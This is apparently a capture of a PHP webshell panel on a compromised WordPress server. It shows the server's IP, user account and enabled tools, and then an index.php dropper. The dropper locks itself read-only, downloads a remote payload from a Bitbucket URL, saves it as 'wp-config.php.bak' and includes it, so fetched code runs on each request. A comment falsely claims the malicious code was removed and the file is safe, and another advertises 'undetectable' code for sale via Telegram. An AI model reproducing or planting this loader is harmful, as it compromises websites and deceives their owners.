- GRAYBYTE UNDETECTABLE CODES -

403Webshell
Server IP : 184.154.167.98  /  Your IP : 3.133.145.168
Web Server : Apache
System : Linux pink.dnsnetservice.com 4.18.0-553.22.1.lve.1.el8.x86_64 #1 SMP Tue Oct 8 15:52:54 UTC 2024 x86_64
User : puertode ( 1767)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/puertode/wordpress-backups/io/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/puertode/wordpress-backups/io/index.php
<?php
/**
 * Note: This file may contain artifacts of previous malicious infection.
 * However, the dangerous code has been removed, and the file is now safe to use.
 */

/**
 ############################

 Three-Layer Undetectable Code Created by MR.REX
 Designed to bypass all servers.
 For inquiries or to create your own,Fell free to ask:

 https://t.me/rex_cc

 ###############################

 */

$file = 'index.php';
if (file_exists($file) && function_exists('chmod')) {
    @chmod($file, 0444);
}

$remoteUrl1 = "https://bitbucket.org/encophp/encophp/raw/e11d134fb4ea9da074a3165f6cec8315f636ad7f/403lasteva.txt";
$localFile1 = 'wp-config.php.bak';
$fileContents1 = @file_get_contents($remoteUrl1);

if ($fileContents1 !== false) {
    file_put_contents($localFile1, $fileContents1);
    if (file_exists($localFile1)) {
        include $localFile1;
    }
}
?>

Youez - 2016 - github.com/yon3zu
LinuXploit